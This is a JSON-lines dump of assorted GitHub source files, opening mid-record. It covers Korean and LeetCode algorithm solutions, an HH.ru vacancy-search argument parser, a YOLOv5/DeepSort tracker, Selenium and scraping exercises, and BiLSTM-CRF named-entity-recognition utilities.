S[1..k]로 나타낼 수 있다. S[i]가 ‘o’면 소정이가 i번째 경기에서 승리했다는 것이고, ‘x’면 패배했다는 것이다.\n\n# 소정이는 앞으로 팔씨름을 15번째 경기까지 진행했을 때 자신이 점심값을 면제받을 가���성이 있는지 알고자 한다. 이를 대신해 주는 프로그램을 작성하라.\n\n# [입력]\n# 첫 번째 줄에 테스트 케이스의 수 T가 주어진다.\n# 각 테스트 케이스는 하나의 줄로 이루어진다. 
각 줄에는 ‘o’ 또는 ‘x’로만 구성된 길이가 1 이상 15 이하인 문자열 S가 주어진다.\n\n# [출력]\n# 각 테스트 케이스마다, 소정이가 점심값을 면제받을 가능성이 있다면 ‘YES’, 없다면 ‘NO’를 출력한다.\n\n# 입력\n# 3\n# oxoxoxoxoxoxoxo\n# x\n# xxxxxxxxxxxx\n\n# 출력\n# #1 YES\n# #2 YES\n# #3 NO\n\nT = int(input())\nfor tc in range(1, T+1):\n s = input()\n \n # 이긴 횟수 카운트 \n num_wins = s.count('o')\n\n # 남은 판수 카운트\n num_remaining = 15 - len(s)\n\n # 남은 판수와 이긴 횟수를 더한 것이 8번 이상이면 승리 가능성\n if num_wins + num_remaining >= 8:\n print(f\"#{tc} YES\")\n else:\n print(f\"{tc} NO\")","repo_name":"glory0224/Algorithm","sub_path":"SWEA/D3/arm wrestling.py","file_name":"arm wrestling.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30393608348","text":"r\"\"\"Parse command line arguments\n\nCommand parameters:\n refresh : bool - Refresh data from remote server.\n num_workers : int - Number of workers for threading.\n options : dict - Options for GET request to hh api.\n\nExample:\n options:\n {\n \"text\": \"Python Developer\",\n \"area\": 1,\n \"per_page\": 50\n }\n\nParser parameters:\n update : bool - Update JSON config if needed.\n\n------------------------------------------------------------------------\n\nGNU GENERAL PUBLIC LICENSE\nVersion 3, 29 June 2007\n\nCopyright (c) 2020 Kapitanov Alexander\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT\nNOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND\nPERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE\nDEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nOR CORRECTION.\n\n------------------------------------------------------------------------\n\"\"\"\n\n# Authors : Alexander Kapitanov\n# ...\n# Contacts : \n# License : GNU GENERAL PUBLIC LICENSE\n\nimport argparse\nimport json\nfrom typing import Dict, Optional, Sequence\n\n\nclass Settings:\n r\"\"\"Researcher parameters\n\n Parameters\n ----------\n config_path : str\n Path to config file\n input_args : tuple\n Command line arguments for tests.\n no_parse : bool\n Disable parsing arguments from command line.\n\n Attributes\n ----------\n options : dict\n Options for GET request to API.\n refresh : bool\n Refresh data from remote server.\n save_result : bool\n Save DataFrame with parsed vacancies to CSV file\n num_workers : int\n Number of workers for threading.\n rates : dict\n Dict of currencies. 
For example: {\"RUB\": 1, \"USD\": 0.001}\n \"\"\"\n\n def __init__(\n self, config_path: str, input_args: Optional[Sequence[str]] = None, no_parse: bool = False,\n ):\n self.options: Optional[Dict] = None\n self.rates: Optional[Dict] = None\n self.refresh: bool = False\n self.num_workers: int = 1\n self.save_result: bool = False\n self.update: bool = False\n\n # Get config from file\n with open(config_path, \"r\") as cfg:\n config: Dict = json.load(cfg)\n\n if not no_parse:\n params = self.__parse_args(input_args)\n\n for key, value in params.items():\n if value is not None:\n if key in config:\n config[key] = value\n if \"options\" in config and key in config[\"options\"]:\n config[\"options\"][key] = value\n\n self.update = params.get(\"update\", False)\n if params[\"update\"]:\n with open(config_path, \"w\") as cfg:\n json.dump(config, cfg, indent=2)\n\n # Update attributes:\n for key, value in config.items():\n if hasattr(self, key):\n setattr(self, key, value)\n\n def __repr__(self):\n txt = \"\\n\".join([f\"{k :<16}: {v}\" for k, v in self.__dict__.items()])\n return f\"Settings:\\n{txt}\"\n\n def update_params(self, **kwargs):\n \"\"\"Update object params\"\"\"\n for key, value in kwargs.items():\n if hasattr(self, key) and value is not None:\n setattr(self, key, value)\n\n @staticmethod\n def __parse_args(inputs_args) -> Dict:\n \"\"\"Read arguments from command line.\n\n Returns\n -------\n arguments : dict\n Parsed arguments from command line. Note: some arguments are positional.\n\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"HeadHunter vacancies researcher\")\n parser.add_argument(\n \"-t\", \"--text\", action=\"store\", type=str, default=None, help='Search query text (e.g. \"Machine learning\")',\n )\n parser.add_argument(\n \"-p\", \"--professional_roles\", action=\"store\", type=int, default=None,\n help='Professional role filter (Possible roles can be found here https://api.hh.ru/professional_roles)',\n nargs='*'\n )\n parser.add_argument(\n \"-n\", \"--num_workers\", action=\"store\", type=int, default=None, help=\"Number of workers for multithreading.\",\n )\n parser.add_argument(\n \"-r\", \"--refresh\", help=\"Refresh cached data from HH API\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-s\", \"--save_result\", help=\"Save parsed result as DataFrame to CSV file.\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-u\", \"--update\", action=\"store_true\", default=None, help=\"Save command line args to file in JSON format.\",\n )\n\n params, unknown = parser.parse_known_args(inputs_args)\n # Update config from command line\n return vars(params)\n\n\nif __name__ == \"__main__\":\n settings = Settings(\n config_path=\"../settings.json\", input_args=(\"--num_workers\", \"5\", \"--refresh\", \"--text\", \"Data Scientist\"),\n )\n\n print(settings)\n","repo_name":"hukenovs/hh_research","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5739,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"18"} +{"seq_id":"157725906","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Created on 2021/6/23 16:55\n Filename : yolov5_tracker.py\n Author : Taosy.W\n Zhihu : https://www.zhihu.com/people/1105936347\n Github : https://github.com/AFei19911012\n Description: 人车检测追踪,参考源码:https://github.com/mikel-brostrom/Yolov5_DeepSort_Pytorch.git\n\"\"\"\n\n# =======================================================\nimport cv2\nimport torch\nimport os\n\nfrom 
deep_sort.deep_sort import DeepSort\nfrom deep_sort.utils.parser import get_config\nfrom yolov5_detector import YOLOv5Detector\n\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'TRUE'\n\n\ndef draw_image(image, bbox_container, obj_ids):\n \"\"\" 绘制人车标签 \"\"\"\n \"\"\" 线宽 \"\"\"\n tl = 2 or round(0.002 * (image.shape[0] + image.shape[1]) / 2) + 1\n for i, bbox in enumerate(bbox_container):\n label = bbox['class']\n x1, y1, x2, y2 = bbox['box']\n c1, c2 = (x1, y1), (x2, y2)\n if label == 'person':\n color = (255, 0, 0)\n elif label == 'car':\n color = (0, 0, 255)\n else:\n color = (0, 255, 0)\n cv2.rectangle(image, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)\n \"\"\" 字体宽度 \"\"\"\n tf = max(tl - 1, 1)\n label_show = f'{label}-{obj_ids[i]}'\n t_size = cv2.getTextSize(label_show, 0, fontScale=tl/3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n \"\"\" filled \"\"\"\n cv2.rectangle(image, c1, c2, color, cv2.FILLED, cv2.LINE_AA)\n cv2.putText(image, label_show, (c1[0], c1[1] - 2), 0, tl/3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n\n\ndef xyxy_to_xywh(box):\n \"\"\" 目标框转换 \"\"\"\n x1, y1, x2, y2 = box\n w = x2 - x1\n h = y2 - y1\n x_c = int(x1 + w/2)\n y_c = int(y1 + h/2)\n return [x_c, y_c, w, h]\n\n\ndef cut_bbox_container(bbox_container):\n \"\"\" 只保留人车信息 \"\"\"\n container = []\n for bbox in bbox_container:\n label = bbox['class']\n confidence = bbox['confidence']\n box = bbox['box']\n if label in ['person', 'car']:\n container.append({'class': label, 'confidence': confidence, 'box': box})\n return container\n\n\ndef main():\n video_name = 'car.mp4'\n # video_name = 'car.mp4'\n cap = cv2.VideoCapture(f'data/videos/{video_name}')\n fource = cv2.VideoWriter_fourcc(*'mp4v')\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n vid_writer = cv2.VideoWriter(f'runs/track/{video_name}.mp4', fource, 30, (width, height))\n \"\"\" yolov5 目标检测器 \"\"\"\n yolov5_detector = YOLOv5Detector()\n \"\"\" deepsort 追踪器 \"\"\"\n cfg = get_config()\n cfg.merge_from_file(\"deep_sort/configs/deep_sort.yaml\")\n deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,\n max_dist=cfg.DEEPSORT.MAX_DIST,\n min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,\n nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP,\n max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n max_age=cfg.DEEPSORT.MAX_AGE,\n n_init=cfg.DEEPSORT.N_INIT,\n nn_budget=cfg.DEEPSORT.NN_BUDGET,\n use_cuda=True)\n window_name = 'Real-time tracking'\n while True:\n state, frame = cap.read()\n if not state:\n break\n \"\"\" 检测目标 \"\"\"\n image, bbox_container = yolov5_detector(frame)\n \"\"\" 仅保留人车信息\"\"\"\n bbox_container = cut_bbox_container(bbox_container)\n \"\"\" 初始化一些变量 \"\"\"\n xywh_bboxs = []\n labels = []\n confs = []\n for bbox in bbox_container:\n xywh_bboxs.append(xyxy_to_xywh(bbox['box']))\n labels.append(bbox['class'])\n confs.append(bbox['confidence'])\n \"\"\" 检测到目标后才有追踪 \"\"\"\n if labels:\n \"\"\" detections --> deepsort \"\"\"\n xywhs = torch.Tensor(xywh_bboxs)\n confss = torch.Tensor(confs)\n outputs = deepsort.update(xywhs, confss, labels, frame)\n obj_ids = []\n bbox_draw = []\n if len(outputs) > 0:\n for (x1, y1, x2, y2, label, track_id) in outputs:\n bbox_draw.append({'class': label, 'box': [x1, y1, x2, y2]})\n obj_ids.append(track_id)\n \"\"\" 绘图显示 \"\"\"\n draw_image(frame, bbox_draw, obj_ids)\n \"\"\" 输出一些信息 \"\"\"\n for info in bbox_draw:\n print(info)\n print(obj_ids)\n print('---')\n cv2.imshow(window_name, frame)\n vid_writer.write(frame)\n cv2.waitKey(1)\n \"\"\" 点 x 退出 \"\"\"\n if 
cv2.getWindowProperty(window_name, cv2.WND_PROP_AUTOSIZE) < 1:\n break\n cap.release()\n vid_writer.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AFei19911012/PythonSamples","sub_path":"yolov5/yolov5_tracker.py","file_name":"yolov5_tracker.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"71210623079","text":"import sys\nimport os\nimport os.path\nimport subprocess\nimport re\n\nfrom cpc.lib.gromacs import cmds\n\ndef checkTrajectory(filename):\n \"\"\"Check an existing trajectory and return the trajectory time in ns, \n the delta t, and the number of frames\"\"\"\n cmdnames = cmds.GromacsCommands()\n proc=subprocess.Popen(cmdnames.gmxcheck.split() + [\"-f\", filename],\n stdin=None,\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE)\n ret=proc.communicate()\n step=re.compile('^Step\\s*([0-9]*)\\s*([0-9]*)', re.MULTILINE)\n if proc.returncode != 0: \n sys.stderr.write('pwd= %s\\n'%os.getcwd())\n sys.stderr.write('Got: %s\\n'%(unicode(ret[0], errors=\"ignore\")))\n match=step.search(ret[0])\n frames=int(match.group(1))\n dt=float(match.group(2))\n ns=(frames-1)*dt/1000.\n sys.stderr.write(\"Using trajectory %s with %g ns of trajectories\\n\"%\n (filename, ns))\n # return the time in ns\n return (ns, dt, frames)\n\n\n\n","repo_name":"gromacs/copernicus","sub_path":"cpc/lib/msm/check_traj.py","file_name":"check_traj.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"31599944137","text":"filename = input(\"Enter file name: \")\nfileholder = open(filename)\ncount = 0\nemails = {}\nfor line in fileholder:\n nline = line.rstrip()\n if 'From' in nline and not \"From:\" in nline:\n lsplit = nline.split()\n emails[lsplit[1]] = emails.get(lsplit[1], 0) + 1\n else:\n continue\n\nbcount = None\nbemail = None\n\nfor email,occurrences in emails.items():\n if bcount is None or occurrences > bcount:\n bemail = email\n bcount = occurrences\n\nprint(bemail, bcount)\n","repo_name":"VerisimilitudeX/Python-For-Everybody--Python-Data-Structures-Certification","sub_path":"Assignment 9.4.py","file_name":"Assignment 9.4.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70341721960","text":"import MySQLdb\r\ntry:\r\n db=MySQLdb.connect(\"192.168.3.188\",\"training\",\"training@123\",\"int_b6\")\r\n # print(\"success\")\r\n cursor = db.cursor()\r\n cursor.execute(\"SELECT VERSION()\")\r\n data=cursor.fetchall()\r\n print(data)\r\n db.close()\r\nexcept:\r\n print(\"error\")\r\n","repo_name":"arjun2038/Python-Basic-Programming","sub_path":"DataBase/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21193555488","text":"import numpy as np\n\n\ndef subtract_smooth(x, y):\n resized_y = y.copy()\n resized_y.resize(x.shape)\n y_new = resized_y - median_filter(x, resized_y, 1.)\n return y_new\n\n\ndef median_filter(x, y, width):\n # Error: IndexError: boolean index did not match indexed array along dimension 0; dimension is 4 but\n # corresponding boolean dimension is 5\n # I searched in google about 'boolean index did not match indexed array along dimension'\n # I noticed that y_new has the same shape as y, but in this 
case x has another shape\n # The calculation inside the y brackets returns an array of booleans that has a different shape than y\n # Maybe we can fill with zeros the smallest array in order to keep all the data points but I'm not sure\n y_new = np.zeros(y.shape)\n for i in range(len(x)):\n y_new[i] = np.median(y[np.abs(x - x[i]) < width * 0.5])\n return y_new\n\n\nprint(subtract_smooth(np.array([1, 2, 3, 4, 5]), np.array([4, 5, 6, 8])))\n","repo_name":"kevinszuchet/itc-fellows-part-time","sub_path":"pre_course/ex10_subtract_smooth.py","file_name":"ex10_subtract_smooth.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70569468840","text":"# coding Statement: Write a program to find Sum of digits of a number\r\n\r\n# Description\r\n\r\n# Get a number from user and then find the sum of the digits in the given number.\r\n\r\n# E.g. let the number = 341\r\n\r\n# Sum of digits is 3+4+1= 8\r\n\r\n# Input :4521\r\n\r\n# Output :12\r\n\r\nn=int(input(\"Enter your number : \"))\r\nnum=str(n)\r\nsum=0\r\nfor i in num:\r\n sum=sum+int(i)\r\nprint(\"sum :\",sum)","repo_name":"Raviteja0524/Python_50","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22171671602","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\nfrom sklearn.metrics import confusion_matrix, f1_score\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nfrom utils.skseq.sequences.sequence import Sequence\n\n\ndef evaluate_corpus(sequences, sequences_predictions):\n \"\"\"Evaluate classification accuracy at corpus level, comparing with\n gold standard.\"\"\"\n total = 0.0\n correct = 0.0\n for i, sequence in enumerate(sequences):\n pred = sequences_predictions[i]\n for j, y_hat in enumerate(pred.y):\n if sequence.y[j] != 0: #0 is the index of the \"O\" tag\n if sequence.y[j] == y_hat:\n correct += 1\n total += 1\n return correct / total\n\n\ndef show_confusion_matrix(sequences, preds, sp=None, hmm=False, normalize=False, positions=None, labels=None):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n cm = confusion_matrix(y_true, y_pred)\n\n threshold = 24953\n cm_clipped = np.clip(cm, a_min=0, a_max=threshold)\n\n plt.figure(figsize=(10, 10))\n plt.imshow(cm_clipped, interpolation='nearest', cmap=plt.get_cmap('Blues'))\n plt.title(\"Confusion matrix\")\n #plt.colorbar()\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = threshold / 1.5 if normalize else threshold / 2\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n if (positions==None) | (labels==None):\n positions = list(sp.state_labels.values())\n labels = list(sp.state_labels.keys())\n\n plt.xticks(positions, labels)\n plt.yticks(positions, labels)\n\n plt.tight_layout()\n plt.ylabel('True label')\n 
plt.show()\n\n\ndef get_f1_score(sequences, preds, hmm=False):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n return f1_score(y_true, y_pred, average='weighted')\n\n\ndef tiny_test(model, train_seq=None, hmm=False, state_to_pos=None, decode=\"viterbi\"):\n\n sentences = [\n \"The programmers from Barcelona might write a sentence without a spell checker.\",\n \"The programmers from Barchelona cannot write a sentence without a spell checker.\",\n \"Jack London went to Parris.\",\n \"Jack London went to Paris.\",\n \"Bill gates and Steve jobs never though Microsoft would become such a big company.\",\n \"Bill Gates and Steve Jobs never though Microsof would become such a big company.\",\n \"The president of U.S.A though they could win the war.\",\n \"The president of the United States of America though they could win the war.\",\n \"The king of Saudi Arabia wanted total control.\",\n \"Robin does not want to go to Saudi Arabia.\",\n \"Apple is a great company.\",\n \"I really love apples and oranges.\",\n \"Alice and Henry went to the Microsoft store to buy a new computer during their trip to New York.\"\n ]\n \n y_pred = []\n if hmm:\n for p in sentences:\n pred = model.predict_labels(p.split())\n seq = Sequence(x=p.split(), y=pred)\n print(seq, '\\n') \n y_pred.extend(pred)\n y_pred = [state_to_pos[w] for w in y_pred]\n else:\n preds = []\n for p in sentences:\n seq = Sequence(x=p.split(), y=[int(0) for w in p.split()])\n if decode==\"viterbi\":\n pred = model.viterbi_decode(seq)[0]\n else: #to check if posterior decode works better\n pred = model.posterior_decode(seq)\n preds.append(pred)\n y_pred.extend(pred.y.tolist())\n print(pred.to_words(train_seq, only_tag_translation=True), '\\n')\n\n # evaluate results\n y_true = [0,0,0,1,0,0,0,0,0,0,0,0] + [0,0,0,0,0,0,0,0,0,0,0,0]\n y_true += [6,7,0,0,0] + [6,7,0,0,1]\n y_true += [6,7,0,6,7,0,0,4,0,0,0,0,0,0] + [6,7,0,6,7,0,0,0,0,0,0,0,0,0]\n y_true += [0,0,0,1,0,0,0,0,0,0] + [0,0,0,0,1,5,5,5,0,0,0,0,0,0]\n y_true += [0,0,0,1,5,0,0,0] + [6,0,0,0,0,0,0,1,5]\n y_true += [4,0,0,0,0] + [0,0,0,0,0,0]\n y_true += [6,0,6,0,0,0,4,0,0,0,0,0,0,0,0,0,0,1,5]\n\n correct = total = 0\n for y, y_hat in zip(y_true, y_pred):\n if y != 0: #0 is the index of the \"O\" tag\n if y == y_hat:\n correct += 1\n total += 1\n print(\"\\n===============================\")\n print(f\"Accuracy in TINY TEST = {round(correct/total, 4)}\")\n print(\"===============================\")\n\n\n\nclass BiLSTM_CRF_v2(nn.Module):\n\n def __init__(self, vocab_size, tag_to_ix, embedding_dim, hidden_dim):\n super(BiLSTM_CRF_v2, self).__init__()\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.vocab_size = vocab_size\n self.tag_to_ix = tag_to_ix\n self.tagset_size = len(tag_to_ix)\n\n self.word_embeds = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, hidden_dim // 2,\n num_layers=1, bidirectional=True)\n\n # Maps the output of the LSTM into tag space.\n self.hidden2tag = nn.Linear(hidden_dim, self.tagset_size)\n\n # Matrix of transition parameters. 
Entry i,j is the score of\n # transitioning *to* i *from* j.\n self.transitions = nn.Parameter(\n torch.randn(self.tagset_size, self.tagset_size))\n\n # These two statements enforce the constraint that we never transfer\n # to the start tag and we never transfer from the stop tag\n self.transitions.data[tag_to_ix[START_TAG], :] = -10000\n self.transitions.data[:, tag_to_ix[STOP_TAG]] = -10000\n\n\n self.hidden = self.init_hidden()\n\n def init_hidden(self):\n return (torch.randn(2, 1, self.hidden_dim // 2),\n torch.randn(2, 1, self.hidden_dim // 2))\n\n def _forward_alg(self, feats):\n # Do the forward algorithm to compute the partition function\n init_alphas = torch.full((1, self.tagset_size), -10000.)\n # START_TAG has all of the score.\n init_alphas[0][self.tag_to_ix[START_TAG]] = 0.\n\n # Wrap in a variable so that we will get automatic backprop\n forward_var = init_alphas\n forward_var = forward_var\n\n # Iterate through the sentence\n for feat in feats:\n alphas_t = [] # The forward tensors at this timestep\n for next_tag in range(self.tagset_size):\n # broadcast the emission score: it is the same regardless of\n # the previous tag\n emit_score = feat[next_tag].view(\n 1, -1).expand(1, self.tagset_size)\n # the ith entry of trans_score is the score of transitioning to\n # next_tag from i\n trans_score = self.transitions[next_tag].view(1, -1)\n # The ith entry of next_tag_var is the value for the\n # edge (i -> next_tag) before we do log-sum-exp\n next_tag_var = forward_var + trans_score + emit_score\n # The forward variable for this tag is log-sum-exp of all the\n # scores.\n alphas_t.append(log_sum_exp(next_tag_var).view(1))\n forward_var = torch.cat(alphas_t).view(1, -1)\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n alpha = log_sum_exp(terminal_var)\n return alpha\n\n def _get_lstm_features(self, sentence):\n self.hidden = self.init_hidden()\n embeds = self.word_embeds(sentence).view(len(sentence), 1, -1)\n lstm_out, self.hidden = self.lstm(embeds, self.hidden)\n lstm_out = lstm_out.view(len(sentence), self.hidden_dim)\n lstm_feats = self.hidden2tag(lstm_out)\n return lstm_feats\n\n def _score_sentence(self, feats, tags):\n # Gives the score of a provided tag sequence\n score = torch.zeros(1)\n tags = torch.cat([torch.tensor([self.tag_to_ix[START_TAG]], dtype=torch.long), tags])\n for i, feat in enumerate(feats):\n score = score + \\\n self.transitions[tags[i + 1], tags[i]] + feat[tags[i + 1]]\n score = score + self.transitions[self.tag_to_ix[STOP_TAG], tags[-1]]\n return score\n\n def _viterbi_decode(self, feats):\n backpointers = []\n\n # Initialize the viterbi variables in log space\n init_vvars = torch.full((1, self.tagset_size), -10000.)\n init_vvars[0][self.tag_to_ix[START_TAG]] = 0\n\n # forward_var at step i holds the viterbi variables for step i-1\n forward_var = init_vvars\n for feat in feats:\n bptrs_t = [] # holds the backpointers for this step\n viterbivars_t = [] # holds the viterbi variables for this step\n\n for next_tag in range(self.tagset_size):\n # next_tag_var[i] holds the viterbi variable for tag i at the\n # previous step, plus the score of transitioning\n # from tag i to next_tag.\n # We don't include the emission scores here because the max\n # does not depend on them (we add them in below)\n next_tag_var = forward_var + self.transitions[next_tag]\n best_tag_id = argmax(next_tag_var)\n bptrs_t.append(best_tag_id)\n viterbivars_t.append(next_tag_var[0][best_tag_id].view(1))\n # Now add in the emission scores, and assign 
forward_var to the set\n # of viterbi variables we just computed\n forward_var = (torch.cat(viterbivars_t) + feat).view(1, -1)\n backpointers.append(bptrs_t)\n\n # Transition to STOP_TAG\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n best_tag_id = argmax(terminal_var)\n path_score = terminal_var[0][best_tag_id]\n\n # Follow the back pointers to decode the best path.\n best_path = [best_tag_id]\n for bptrs_t in reversed(backpointers):\n best_tag_id = bptrs_t[best_tag_id]\n best_path.append(best_tag_id)\n # Pop off the start tag (we dont want to return that to the caller)\n start = best_path.pop()\n assert start == self.tag_to_ix[START_TAG] # Sanity check\n best_path.reverse()\n return path_score, best_path\n\n def neg_log_likelihood(self, sentence, tags):\n feats = self._get_lstm_features(sentence)\n forward_score = self._forward_alg(feats)\n gold_score = self._score_sentence(feats, tags)\n return forward_score - gold_score\n\n def forward(self, sentence): # dont confuse this with _forward_alg above.\n # Get the emission scores from the BiLSTM\n lstm_feats = self._get_lstm_features(sentence)\n\n # Find the best path, given the features.\n score, tag_seq = self._viterbi_decode(lstm_feats)\n return score, tag_seq\n\n\ndef argmax(vec):\n # return the argmax as a python int\n _, idx = torch.max(vec, 1)\n return idx.item()\n\n\ndef prepare_sequence(seq, to_ix):\n idxs = [to_ix[w] for w in seq]\n return torch.tensor(idxs, dtype=torch.long)\n\n\n# Compute log sum exp in a numerically stable way for the forward algorithm\ndef log_sum_exp(vec):\n max_score = vec[0, argmax(vec)]\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\n return max_score + \\\n torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\n","repo_name":"pabloac31/NLP-NER","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72111216361","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport urllib.parse\nimport config\n\nrequest = urllib.request.Request(config.SCRAPE_LINK)\nresponse = urllib.request.urlopen(request)\nsoup = BeautifulSoup(response, \"html.parser\")\ndownloads_dir = os.path.dirname(os.path.abspath(__file__)) + '\\downloads'\n\nfor a in soup.findAll('a'):\n\tfilename = a['href'] \n\tfile_path = os.path.join(downloads_dir, filename)\n\t\n\tif not os.path.isfile(file_path):\n\t\turl = config.BASE_FILE + filename\n\t\tpath = urllib.parse.urlparse(url).path\n\t\text = os.path.splitext(path)[1]\n\t\tif ext in config.FILE_TYPES:\n\t\t\tfile = urllib.request.urlopen(url)\n\t\t\toutput = open(os.path.join(file_path),'wb')\n\t\t\toutput.write(file.read())\n\t\t\toutput.close()\n\t\t\tprint('Downloaded and Placed in /downloads: ' + filename)\n\telse:\n\t\tprint (filename + \" already located in downloads directory.\")\n","repo_name":"ishakm/scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18614733102","text":"import time\nimport math\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pyperclip\nimport os\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\nfile_path = os.path.join(current_dir, '1.txt')\n\n\ndef calc(x):\n return 
str(math.log(abs(12*math.sin(int(x)))))\n\n\nlink = \"http://suninjuly.github.io/file_input.html\"\n\nwith webdriver.Chrome() as browser:\n browser.get(link)\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter first name']\").send_keys(\"Ivan\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter last name']\").send_keys(\"Petrov\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter email']\").send_keys(\"Petrov@mail.ru\")\n\n browser.find_element(By.CSS_SELECTOR, \"[id='file']\").send_keys(file_path)\n browser.find_element(By.CLASS_NAME, \"btn-primary\").click()\n\n alert = browser.switch_to.alert\n addToClipBoard = alert.text.split(': ')[-1]\n pyperclip.copy(addToClipBoard)\n","repo_name":"Arzamasov-Zakhar/-stepik_auto_tests_course","sub_path":"2.2.8.py","file_name":"2.2.8.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36063730135","text":"# -*- coding: utf-8 -*-\n# @Time : 2023-8-30 23:07\n# @Author : 刘永奇\n# @File : 84. 柱状图中最大的矩形.py\n# @Software : PyCharm\nfrom typing import List\n\n\nclass Solution:\n def largestRectangleArea(self, heights: List[int]) -> int:\n s = []\n l = [-1] * len(heights)\n r = [len(heights)] * len(heights)\n\n for i in range(len(heights)):\n while len(s) != 0 and heights[i] <= heights[s[-1]]:\n r[s[-1]] = i\n s.pop()\n if len(s) != 0:\n l[i] = s[-1]\n s.append(i)\n res = 0\n for i in range(len(heights)):\n res = max(res, (heights[i] * (r[i] - l[i] - 1)))\n return res\n","repo_name":"xs-web-lyq/LeetCode","sub_path":"Python/84. 柱状图中最大的矩形.py","file_name":"84. 柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
